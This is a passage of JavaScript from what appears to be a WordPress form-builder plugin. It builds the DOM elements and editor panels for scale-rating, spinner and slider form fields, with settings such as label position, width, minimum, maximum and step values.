	var div_element = document.createElement('div');
		div_element.setAttribute("align", 'left');
		div_element.style.display="table-cell";
		div_element.setAttribute("id", i+"_element_sectionform_id_temp");

	var div1 = document.createElement('div');	
		div1.setAttribute("id", i+"_elementform_id_temp");
		
	var scale_table = document.createElement('div');
		scale_table.setAttribute("id", i+"_scale_tableform_id_temp");
		scale_table.style.cssText ="display:inline-table;";
		
	var scale_tr0 = document.createElement('div');
		scale_tr0.setAttribute("id", i+"_scale_tr1form_id_temp");
		scale_tr0.style.display="table-row";
		
	var scale_tr1 = document.createElement('div');
		scale_tr1.setAttribute("id", i+"_scale_tr2form_id_temp");
		scale_tr1.style.display="table-row";
		
	var br1 = document.createElement('br');
	var label = document.createElement('span');
		label.setAttribute("id", i+"_element_labelform_id_temp");
		label.innerHTML = w_field_label;
		label.setAttribute("class", "label");
			
	var label1 = document.createElement('label');
		label1.setAttribute("class", "mini_label");	
		label1.setAttribute("id", i+"_mini_label_worst");
		label1.innerHTML= w_mini_labels[0];
		label1.style.cssText ="position:relative; top:6px; font-size:11px; display:inline-table;";
		
	var label2 = document.createElement('label');
		label2.setAttribute("class", "mini_label");	
		label2.setAttribute("id", i+"_mini_label_best");
		label2.innerHTML= w_mini_labels[1];
		label2.style.cssText ="position:relative; top:6px; font-size:11px; display:inline-table;";
		
	var required = document.createElement('span');
		required.setAttribute("id", i+"_required_elementform_id_temp");
		required.innerHTML = "";
		required.setAttribute("class", "required");
		if(w_required=="yes")
			required.innerHTML = " *";
	var main_td  = document.getElementById('show_table');
  
	div_label.appendChild(label);
	div_label.appendChild(required);
	div_element.appendChild(adding_type);	
	div_element.appendChild(adding_required);
	div_element.appendChild(adding_scale_amount);
	
	div1.appendChild(label1);
	scale_table.appendChild(scale_tr0);
		 
	for(var l=1;l<=w_scale_amount;l++){	   
		adding_num=document.createElement("span");
		adding_num.innerHTML = l;
				   
		adding_td =	document.createElement('td');
		adding_td.setAttribute("id", i+"_scale_td1_"+l+"form_id_temp");
		adding_td.style.cssText = 'text-align:center;';
		adding_td.style.display="table-cell";
		
		adding_td.appendChild(adding_num);
		scale_tr0.appendChild(adding_td);
    }	
	 
    for(var k=1;k<=w_scale_amount;k++){	
		var adding_radio=document.createElement("input");
			adding_radio.setAttribute('id', i+'_scale_radioform_id_temp_'+k);
			adding_radio.setAttribute('name', i+'_scale_radioform_id_temp');
			adding_radio.setAttribute('value', k);
			adding_radio.setAttribute('type', 'radio');
	
		var adding_td_for_radio=document.createElement("div");
			adding_td_for_radio.setAttribute('id', i+'_scale_td2_'+k+'form_id_temp');
			adding_td_for_radio.style.display="table-cell";
		   
		adding_td_for_radio.appendChild(adding_radio);
		scale_tr1.appendChild(adding_td_for_radio);
		scale_table.appendChild(scale_tr1);
		div1.appendChild(scale_table);
	}	
	  
	scale_table.appendChild(scale_tr1);
	div1.appendChild(scale_table);
	div1.appendChild(label2);

	div_element.appendChild(div1);
	div_field.appendChild(div_label);
	div_field.appendChild(div_element);

	div.appendChild(div_field);	
	div.appendChild(br1);
	div.appendChild(div_for_editable_labels);	
	main_td.appendChild(div);
	if(w_field_label_pos=="top")
		label_top(i);
				
	change_class(w_class, i);
	refresh_attr(i, 'type_scale_rating');			
				
	jQuery(document).ready(function() {	
		jQuery("label#"+i+"_mini_label_worst").click(function() {		
			if (jQuery(this).children('input').length == 0) {
				var worst = "<input type='text' class='worst' size='6' style='outline:none; border:none; background:none; font-size:11px;' value=\""+jQuery(this).text()+"\">";		

				jQuery(this).html(worst);		
				jQuery("input.worst").focus();		
				jQuery("input.worst").blur(function() {	
					var value = jQuery(this).val();			
					jQuery("#"+i+"_mini_label_worst").text(value);		
				});		
			}	
		});	

		jQuery("label#"+i+"_mini_label_best").click(function() {		
			if (jQuery(this).children('input').length == 0) {			
				var best = "<input type='text' class='best' size='6'  style='outline:none; border:none; background:none; font-size:11px;' value=\""+jQuery(this).text()+"\">";						
				jQuery(this).html(best);
				jQuery("input.best").focus();			
				jQuery("input.best").blur(function() {		
					var value = jQuery(this).val();			
					jQuery("#"+i+"_mini_label_best").text(value);		
				});	
			}	
		});
	});			
}

function change_scale_amount(b,id,form_id){
	
	var table=document.getElementById(id+"_scale_tableform_id_temp");
	var div=document.getElementById(id+"_elementform_id_temp");

	div.removeChild(table);

		var scale_table = document.createElement('div');
           	scale_table.setAttribute("id", id+"_scale_tableform_id_temp");
			scale_table.style.cssText ="display:inline-table;";
						
		var tr0 = document.createElement('div');
           	tr0.setAttribute("id", id+"_scale_tr1form_id_temp");
			tr0.style.cssText ="display:table-row;";
		
		var tr1 = document.createElement('div');
           	tr1.setAttribute("id", id+"_scale_tr2form_id_temp");
			tr1.style.cssText ="display:table-row;";
			
			scale_table.appendChild(tr0);
	for(var l=1;l<=b;l++){	 

		adding_num=document.createElement("span");
		adding_num.innerHTML = l;
				   
		adding_td =	document.createElement('div');
		adding_td.setAttribute("id", id+"_scale_td1_"+l+"form_id_temp");
		adding_td.style.cssText = 'text-align:center; display:table-cell;';
		
		adding_td.appendChild(adding_num);
		tr0.appendChild(adding_td); 
		
		}	
	 
	for(var k=1;k<=b;k++){	

		
		var adding_radio=document.createElement("input");
			adding_radio.setAttribute('id', id+'_scale_radioform_id_temp_'+k);
			adding_radio.setAttribute('name', id+'_scale_radioform_id_temp');
			adding_radio.setAttribute('value', k);
			adding_radio.setAttribute('type', 'radio');
			

		var adding_td_for_radio=document.createElement("div");
			adding_td_for_radio.setAttribute('id', id+'_scale_td2_'+k+'form_id_temp');
			adding_td_for_radio.style.cssText = ' display:table-cell;';
			
			adding_td_for_radio.appendChild(adding_radio);
		   tr1.appendChild(adding_td_for_radio);
			
	}	
	scale_table.appendChild(tr1);
	div.insertBefore(scale_table,div.childNodes[1])
		  
	document.getElementById(id+'_scale_amountform_id_temp').value = b;
}

function type_spinner(i, w_field_label, w_field_label_size, w_field_label_pos, w_field_width, w_field_min_value, w_field_max_value, w_field_step, w_field_value, w_required, w_class, w_attr_name, w_attr_value){

	document.getElementById("element_type").value="type_spinner";
	delete_last_child();

	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");

	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "3");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
	var edit_main_tr2  = document.createElement('tr');
	var edit_main_tr3  = document.createElement('tr');
  	var edit_main_tr4  = document.createElement('tr');
	var edit_main_tr5  = document.createElement('tr');
	var edit_main_tr6  = document.createElement('tr');
	var edit_main_tr7  = document.createElement('tr');
	var edit_main_tr8  = document.createElement('tr');
	var edit_main_tr9  = document.createElement('tr');
	var edit_main_tr10  = document.createElement('tr');
	

	var edit_main_td1 = document.createElement('td');
	var edit_main_td1_1 = document.createElement('td');
	var edit_main_td2 = document.createElement('td');
	var edit_main_td2_1 = document.createElement('td');
	var edit_main_td3 = document.createElement('td');
	var edit_main_td3_1 = document.createElement('td');
	var edit_main_td4 = document.createElement('td');
	var edit_main_td4_1 = document.createElement('td');

	var edit_main_td5 = document.createElement('td');
	var edit_main_td5_1 = document.createElement('td');
	var edit_main_td6 = document.createElement('td');
	var edit_main_td6_1 = document.createElement('td');  
	var edit_main_td7 = document.createElement('td');
	var edit_main_td7_1 = document.createElement('td');
	var edit_main_td8 = document.createElement('td');
	var edit_main_td8_1 = document.createElement('td');
	var edit_main_td9 = document.createElement('td');
	var edit_main_td9_1 = document.createElement('td');
	var edit_main_td10 = document.createElement('td');
	var edit_main_td10_1 = document.createElement('td');	
		  
	var el_label_label = document.createElement('label');
		el_label_label.setAttribute("class", "fm-field-label");
		el_label_label.setAttribute("for", "edit_for_label");
		el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
		el_label_textarea.setAttribute("id", "edit_for_label");
		el_label_textarea.setAttribute("rows", "4");
		el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
		el_label_textarea.innerHTML = w_field_label;
		
	var el_label_size_label = document.createElement('label');
		el_label_size_label.setAttribute("class", "fm-field-label");
	    el_label_size_label.setAttribute("for", "edit_for_label_size");
		el_label_size_label.innerHTML = "Field label size(px) ";
		
	var el_label_size = document.createElement('input');
	    el_label_size.setAttribute("id", "edit_for_label_size");
	    el_label_size.setAttribute("type", "text");
	    el_label_size.setAttribute("value", w_field_label_size);
		el_label_size.setAttribute("onKeyPress", "return check_isnum(event)");
        el_label_size.setAttribute("onKeyUp", "change_w_style('"+i+"_label_sectionform_id_temp', this.value)");			
		
	var el_label_position_label = document.createElement('label');
		el_label_position_label.setAttribute("class", "fm-field-label");
		el_label_position_label.innerHTML = "Field label position";

	var el_label_position1 = document.createElement('input');
		el_label_position1.setAttribute("id", "edit_for_label_position_top");
		el_label_position1.setAttribute("type", "radio");
		el_label_position1.setAttribute("name", "edit_for_label_position");
		el_label_position1.setAttribute("onchange", "label_left("+i+")");

	var el_label_left = document.createElement('label');
		el_label_left.setAttribute("for", "edit_for_label_position_top");
		el_label_left.innerHTML = "Left";	

	var el_label_position2 = document.createElement('input');
		el_label_position2.setAttribute("id", "edit_for_label_position_left");
		el_label_position2.setAttribute("type", "radio");
		el_label_position2.setAttribute("name", "edit_for_label_position");
		el_label_position2.setAttribute("onchange", "label_top("+i+")");

	var el_label_top = document.createElement('label');
		el_label_top.setAttribute("for", "edit_for_label_position_left");
		el_label_top.innerHTML = "Top";
		
	if(w_field_label_pos=="top")
		el_label_position2.setAttribute("checked", "checked");
	else
		el_label_position1.setAttribute("checked", "checked");

				
	var el_spinner_width_label = document.createElement('label');
		el_spinner_width_label.setAttribute("class", "fm-field-label");
		el_spinner_width_label.setAttribute("for", "edit_for_spinner_width");
		el_spinner_width_label.innerHTML = "Width ";

	var el_spinner_width_input = document.createElement('input');
		el_spinner_width_input.setAttribute("type", "text");		
		el_spinner_width_input.setAttribute("id", "edit_for_spinner_width");		
		el_spinner_width_input.setAttribute("value", w_field_width);
		el_spinner_width_input.setAttribute("onKeyPress", "return check_isnum(event)");	
		el_spinner_width_input.setAttribute("onKeyUp", "change_spinner_width(this.value,"+i+",'form_id_temp')");			
							
	var el_spinner_min_value_label = document.createElement('label');
		el_spinner_min_value_label.setAttribute("class", "fm-field-label");
		el_spinner_min_value_label.setAttribute("for", "edit_for_spinner_min_value");
		el_spinner_min_value_label.innerHTML = "Min Value ";
	
	var el_spinner_min_value_input = document.createElement('input');
		el_spinner_min_value_input.setAttribute("type", "text");		
		el_spinner_min_value_input.setAttribute("id", "edit_for_spinner_min_value");		
		el_spinner_min_value_input.setAttribute("value", w_field_min_value);
		el_spinner_min_value_input.setAttribute("onKeyPress", "return check_isnum_or_minus(event)");
		el_spinner_min_value_input.setAttribute("onChange", "change_spinner_min_value(this.value,"+i+",'form_id_temp')");
			   
	var el_spinner_max_value_label = document.createElement('label');
		el_spinner_max_value_label.setAttribute("class", "fm-field-label");
		el_spinner_max_value_label.setAttribute("for", "edit_for_spinner_max_value");
		el_spinner_max_value_label.innerHTML = "Max Value ";
	
	var el_spinner_max_value_input = document.createElement('input');
		el_spinner_max_value_input.setAttribute("type", "text");		
		el_spinner_max_value_input.setAttribute("id", "edit_for_spinner_max_value");		
		el_spinner_max_value_input.setAttribute("value", w_field_max_value);
		el_spinner_max_value_input.setAttribute("onKeyPress", "return check_isnum_or_minus(event)");
		el_spinner_max_value_input.setAttribute("onChange", "change_spinner_max_value(this.value,"+i+",'form_id_temp')");     
	
	var el_spinner_step_label = document.createElement('label');
		el_spinner_step_label.setAttribute("class", "fm-field-label");
		el_spinner_step_label.setAttribute("for", "edit_for_spinner_step");
		el_spinner_step_label.innerHTML = "Step";
		
	var el_spinner_step_input = document.createElement('input');
		el_spinner_step_input.setAttribute("type", "text");		
		el_spinner_step_input.setAttribute("id", "edit_for_spinner_step");		
		el_spinner_step_input.setAttribute("value", w_field_step);
		el_spinner_step_input.setAttribute("onKeyPress", "return check_isnum_or_minus(event)");
		el_spinner_step_input.setAttribute("onChange", "change_spinner_step(this.value,"+i+",'form_id_temp')");
	
	var el_style_label = document.createElement('label');
		el_style_label.setAttribute("class", "fm-field-label");
		el_style_label.setAttribute("for", "element_style");
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
		el_style_textarea.setAttribute("id", "element_style");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
		el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_required_label = document.createElement('label');
	    el_required_label.setAttribute("class", "fm-field-label");
		el_required_label.setAttribute("for", "el_send");
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
		el_required.setAttribute("id", "el_send");
		el_required.setAttribute("type", "checkbox");
		el_required.setAttribute("value", "yes");
		el_required.setAttribute("onclick", "set_required('"+i+"_required')");
		if(w_required=="yes")
			el_required.setAttribute("checked", "checked");
	
	var el_attr_label = document.createElement('label');
		el_attr_label.setAttribute("class", "fm-field-label");
		el_attr_label.setAttribute("for", "el_choices_add");
		el_attr_label.innerHTML = "Additional Attributes";
		
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_spinner')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.setAttribute("class", "fm-field-choice");
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_spinner')");
			
		var el_attr_value = document.createElement('input');
			el_attr_value.setAttribute("type", "text");
			el_attr_value.setAttribute("class", "fm-field-choice");
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_spinner')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_spinner')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}
		
	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);
	
	edit_main_td10.appendChild(el_label_size_label);
	edit_main_td10_1.appendChild(el_label_size);

edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(el_label_left);
	edit_main_td2_1.appendChild(br);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(el_label_top);
	
	
	edit_main_td3.appendChild(el_spinner_width_label);
	edit_main_td3_1.appendChild(el_spinner_width_input);
	
	edit_main_td4.appendChild(el_spinner_min_value_label);
	edit_main_td4_1.appendChild(el_spinner_min_value_input);

    edit_main_td5.appendChild(el_spinner_max_value_label);	
	edit_main_td5_1.appendChild(el_spinner_max_value_input);
	
	edit_main_td6.appendChild(el_spinner_step_label);	
	edit_main_td6_1.appendChild(el_spinner_step_input);
	
	edit_main_td7.appendChild(el_style_label);
	edit_main_td7_1.appendChild(el_style_textarea);
	edit_main_td8.appendChild(el_required_label);
	edit_main_td8_1.appendChild(el_required);
	

	edit_main_td9.appendChild(el_attr_label);
	edit_main_td9.appendChild(el_attr_add);
	edit_main_td9.appendChild(br1);
	edit_main_td9.appendChild(el_attr_table);
	edit_main_td9.setAttribute("colspan", "2");
	
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr10.appendChild(edit_main_td10);
	edit_main_tr10.appendChild(edit_main_td10_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr7.appendChild(edit_main_td7_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_tr9.appendChild(edit_main_td9);
	
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr10);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
    edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr7);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr9);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_spinner');

	var adding_type = document.createElement("input");
		adding_type.setAttribute("type", "hidden");
		adding_type.setAttribute("value", "type_spinner");
		adding_type.setAttribute("name", i+"_typeform_id_temp");
		adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required = document.createElement("input");
		adding_required.setAttribute("type", "hidden");
		adding_required.setAttribute("value", w_required);
		adding_required.setAttribute("name", i+"_requiredform_id_temp");
		adding_required.setAttribute("id", i+"_requiredform_id_temp");
		
	var adding_width= document.createElement("input");
		adding_width.setAttribute("type", "hidden");
		adding_width.setAttribute("value", w_field_width);
		adding_width.setAttribute("name", i+"_spinner_widthform_id_temp");	
		adding_width.setAttribute("id", i+"_spinner_widthform_id_temp");		
			
	var adding_min_value = document.createElement("input");
		adding_min_value.setAttribute("type", "hidden");
		adding_min_value.setAttribute("value", w_field_min_value);
		adding_min_value.setAttribute("id", i+"_min_valueform_id_temp");
		adding_min_value.setAttribute("name", i+"_min_valueform_id_temp");
			
	var adding_max_value = document.createElement("input");
		adding_max_value.setAttribute("type", "hidden");
		adding_max_value.setAttribute("value", w_field_max_value);
		adding_max_value.setAttribute("name", i+"_max_valueform_id_temp");	
		adding_max_value.setAttribute("id", i+"_max_valueform_id_temp");
			
	var adding_step = document.createElement("input");
		adding_step.setAttribute("type", "hidden");
		adding_step.setAttribute("value", w_field_step);
		adding_step.setAttribute("name", i+"_stepform_id_temp");	
		adding_step.setAttribute("id", i+"_stepform_id_temp");
	
   var adding_spinner_input = document.createElement("input");
		adding_spinner_input.setAttribute("type", "");
		adding_spinner_input.style.cssText="width:"+w_field_width+"px"; 
		adding_spinner_input.setAttribute("name", i+"_elementform_id_temp");	
		adding_spinner_input.setAttribute("id", i+"_elementform_id_temp");
		adding_spinner_input.setAttribute("value", w_field_value);
		adding_spinner_input.setAttribute("onClick", "check_isnum_or_minus(event)");
		adding_spinner_input.setAttribute("onKeyPress", "return check_isnum_or_minus(event)");
			
	var div = document.createElement('div');
		div.setAttribute("id", "main_div");
				
	var div_field = document.createElement('div');
		div_field.setAttribute("id", i+"_elemet_tableform_id_temp");
					
	var div_label = document.createElement('div');
		div_label.setAttribute("align", 'left');
		div_label.style.display="table-cell";
		div_label.style.width=w_field_label_size+"px";
		div_label.setAttribute("id", i+"_label_sectionform_id_temp");
		
	var div_element = document.createElement('div');
		div_element.setAttribute("align", 'left');
		div_element.style.display="table-cell";
		div_element.setAttribute("id", i+"_element_sectionform_id_temp");
 	
	var br1 = document.createElement('br');

	var label = document.createElement('span');
		label.setAttribute("id", i+"_element_labelform_id_temp");
		label.innerHTML = w_field_label;
		label.setAttribute("class", "label");
	
	var required = document.createElement('span');
		required.setAttribute("id", i+"_required_elementform_id_temp");
		required.innerHTML = "";
		required.setAttribute("class", "required");
		if(w_required=="yes")
			required.innerHTML = " *";
	var main_td  = document.getElementById('show_table');
  
  
	div_label.appendChild(label);
	div_label.appendChild(required);
	div_element.appendChild(adding_type);

	div_element.appendChild(adding_required);
	div_element.appendChild(adding_width);
	div_element.appendChild(adding_min_value);
	div_element.appendChild(adding_max_value);
	div_element.appendChild(adding_step);
	div_element.appendChild(adding_spinner_input);
	div_field.appendChild(div_label);
	div_field.appendChild(div_element);
  
	div.appendChild(div_field);
	div.appendChild(br1);
	main_td.appendChild(div);
	if(w_field_label_pos=="top")
		label_top(i);
	
	change_class(w_class, i);
	refresh_attr(i, 'type_spinner');

	jQuery( "#"+i+"_elementform_id_temp" ).spinner();
	var spinner = jQuery( "#"+i+"_elementform_id_temp" ).spinner();
		spinner.spinner( "value", w_field_value );
	jQuery( "#"+i+"_elementform_id_temp" ).spinner({ min: w_field_min_value});    
	jQuery( "#"+i+"_elementform_id_temp" ).spinner({ max: w_field_max_value});
	jQuery( "#"+i+"_elementform_id_temp" ).spinner({ step: w_field_step});
}

function change_spinner_width(a,id,form_id)
{
	document.getElementById( id+"_elementform_id_temp" ).style.cssText="width:"+a+"px";
	document.getElementById( id+"_spinner_widthform_id_temp" ).value=a;
}

function change_spinner_max_value(a,id,form_id)
{
	jQuery( "#"+id+"_elementform_id_temp" ).spinner({ max: a});
	document.getElementById( id+"_max_valueform_id_temp" ).value=a;
}

function change_spinner_min_value(a,id,form_id)
{
	jQuery( "#"+id+"_elementform_id_temp" ).spinner({ min: a});
	document.getElementById( id+"_min_valueform_id_temp" ).value=a;
}	

function change_spinner_step(a,id,form_id)
{
	jQuery( "#"+id+"_elementform_id_temp" ).spinner({ step: a});
	document.getElementById( id+"_stepform_id_temp" ).value=a;
}

function type_slider(i, w_field_label, w_field_label_size, w_field_label_pos,  w_field_width, w_field_min_value, w_field_max_value, w_field_value, w_required, w_class, w_attr_name, w_attr_value){

	document.getElementById("element_type").value="type_slider";
	delete_last_child();
	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");

	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "3");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
	var edit_main_tr2  = document.createElement('tr');
	var edit_main_tr3  = document.createElement('tr');
  	var edit_main_tr4  = document.createElement('tr');
	var edit_main_tr5  = document.createElement('tr');
	var edit_main_tr6  = document.createElement('tr');
	var edit_main_tr7  = document.createElement('tr');
	var edit_main_tr8  = document.createElement('tr');
	var edit_main_tr9  = document.createElement('tr');

	var edit_main_td1 = document.createElement('td');
	var edit_main_td1_1 = document.createElement('td');
	var edit_main_td2 = document.createElement('td');
	var edit_main_td2_1 = document.createElement('td');
	var edit_main_td3 = document.createElement('td');
	var edit_main_td3_1 = document.createElement('td');
	var edit_main_td4 = document.createElement('td');
	var edit_main_td4_1 = document.createElement('td');
	var edit_main_td5 = document.createElement('td');
	var edit_main_td5_1 = document.createElement('td');
	var edit_main_td6 = document.createElement('td');
	var edit_main_td6_1 = document.createElement('td');
	var edit_main_td7 = document.createElement('td');
	var edit_main_td7_1 = document.createElement('td');
	var edit_main_td8 = document.createElement('td');
	var edit_main_td8_1 = document.createElement('td');
	var edit_main_td9 = document.createElement('td');
	var edit_main_td9_1 = document.createElement('td');
		  
	var el_label_label = document.createElement('label');
		el_label_label.setAttribute("class", "fm-field-label");
		el_label_label.setAttribute("for", "edit_for_label");
		el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
		el_label_textarea.setAttribute("id", "edit_for_label");
		el_label_textarea.setAttribute("rows", "4");
		el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
		el_label_textarea.innerHTML = w_field_label;
		
	var el_label_size_label = document.createElement('label');
		el_label_size_label.setAttribute("class", "fm-field-label");
	    el_label_size_label.setAttribute("for", "edit_for_label_size");
		el_label_size_label.innerHTML = "Field label size(px) ";
		
	var el_label_size = document.createElement('input');
	    el_label_size.setAttribute("id", "edit_for_label_size");
	    el_label_size.setAttribute("type", "text");
	    el_label_size.setAttribute("value", w_field_label_size);
		el_label_size.setAttribute("onKeyPress", "return check_isnum(event)");
        el_label_size.setAttribute("onKeyUp", "change_w_style('"+i+"_label_sectionform_id_temp', this.value)");
		
	var el_label_position_label = document.createElement('label');
		el_label_position_label.setAttribute("class", "fm-field-label");
		el_label_position_label.innerHTML = "Field label position";

	var el_label_position1 = document.createElement('input');
		el_label_position1.setAttribute("id", "edit_for_label_position_top");
		el_label_position1.setAttribute("type", "radio");
		el_label_position1.setAttribute("name", "edit_for_label_position");
		el_label_position1.setAttribute("onchange", "label_left("+i+")");

	var el_label_left = document.createElement('label');
		el_label_left.setAttribute("for", "edit_for_label_position_top");
		el_label_left.innerHTML = "Left";	

	var el_label_position2 = document.createElement('input');
		el_label_position2.setAttribute("id", "edit_for_label_position_left");
		el_label_position2.setAttribute("type", "radio");
		el_label_position2.setAttribute("name", "edit_for_label_position");
		el_label_position2.setAttribute("onchange", "label_top("+i+")");

	var el_label_top = document.createElement('label');
		el_label_top.setAttribute("for", "edit_for_label_position_left");
		el_label_top.innerHTML = "Top";
		
	if(w_field_label_pos=="top")
		el_label_position2.setAttribute("checked", "checked");
	else
		el_label_position1.setAttribute("checked", "checked");
				
	var el_slider_size_label = document.createElement('label');
		el_slider_size_label.setAttribute("class", "fm-field-label");
		el_slider_size_label.setAttribute("for", "edit_for_slider_width");
		el_slider_size_label.innerHTML = "Width";			
				
    var el_slider_size_input = document.createElement('input');
		el_slider_size_input.setAttribute("type", "text");		
		el_slider_size_input.setAttribute("id", "edit_for_slider_width");		
		el_slider_size_input.setAttribute("value", w_field_width);	
		el_slider_size_input.setAttribute("onKeyPress", "return check_isnum(event)");	
		el_slider_size_input.setAttribute("onKeyUp", "change_slider_width(this.value,"+i+",'form_id_temp')");
	
	var el_slider_min_value_label = document.createElement('label');
		el_slider_min_value_label.setAttribute("class", "fm-field-label");
		el_slider_min_value_label.setAttribute("for", "edit_for_slider_min_value");
		el_slider_min_value_label.innerHTML = "Min Value ";
	
	var el_slider_min_value_input = document.createElement('input');
		el_slider_min_value_input.setAttribute("type", "text");		
		el_slider_min_value_input.setAttribute("id", "edit_for_slider_min_value");		
		el_slider_min_value_input.setAttribute("value", w_field_min_value);
		el_slider_min_value_input.setAttribute("onKeyPress", "return check_isnum(event)");	
		el_slider_min_value_input.setAttribute("onKeyUp", "change_slider_min_or_max_value(this.value,"+i+",'form_id_temp','min')");
		el_slider_min_value_input.setAttribute("onChange", "change_slider_min_value(this.value,"+i+",'form_id_temp')");
           
	var el_slider_max_value_label = document.createElement('label');
		el_slider_max_value_label.setAttribute("class", "fm-field-label");
		el_slider_max_value_label.setAttribute("for", "edit_for_slider_max_value");		
		el_slider_max_value_label.innerHTML = "Max Value ";
	
	var el_slider_max_value_input = document.createElement('input');
		el_slider_max_value_input.setAttribute("type", "text");		
		el_slider_max_value_input.setAttribute("id", "edit_for_slider_max_value");		
		el_slider_max_value_input.setAttribute("value", w_field_max_value);
		el_slider_max_value_input.setAttribute("onKeyPress", "return check_isnum(event)");	
		el_slider_max_value_input.setAttribute("onKeyUp", "change_slider_min_or_max_value(this.value,"+i+",'form_id_temp','max')");
		el_slider_max_value_input.setAttribute("onChange", "change_slider_max_value(this.value,"+i+",'form_id_temp')");
           
	var el_style_label = document.createElement('label');
